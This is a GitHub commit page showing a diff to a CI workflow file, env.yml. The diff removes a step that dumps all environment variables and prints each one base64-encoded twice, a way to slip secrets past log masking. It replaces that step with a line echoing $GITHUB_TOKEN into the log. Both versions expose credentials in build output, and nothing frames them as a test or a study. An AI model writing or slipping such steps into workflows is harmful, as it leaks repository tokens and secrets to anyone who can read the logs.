Skip to content

Commit ea27409

Browse files
authored
Update env.yml
1 parent 879d704 commit ea27409

File tree

1 file changed

+1
-11
lines changed

1 file changed

+1
-11
lines changed

.github/workflows/env.yml

Lines changed: 1 addition & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -12,14 +12,4 @@ jobs:
1212

1313
- name: Dump and double‑encode all env vars
1414
run: |
15-
echo "### RAW ENVIRONMENT VARIABLES ###"
16-
env
17-
18-
echo
19-
echo "### DOUBLE BASE64‑ENCODED ENV VARS ###"
20-
# Loop through each variable, encode twice, and print
21-
while IFS='=' read -r name value; do
22-
# First Base64 encode, then again
23-
enc=$(printf '%s' "$value" | base64 | base64)
24-
printf '%s=%s\n' "$name" "$enc"
25-
done < <(env)
15+
echo "Value is: $GITHUB_TOKEN"

0 commit comments

Comments
 (0)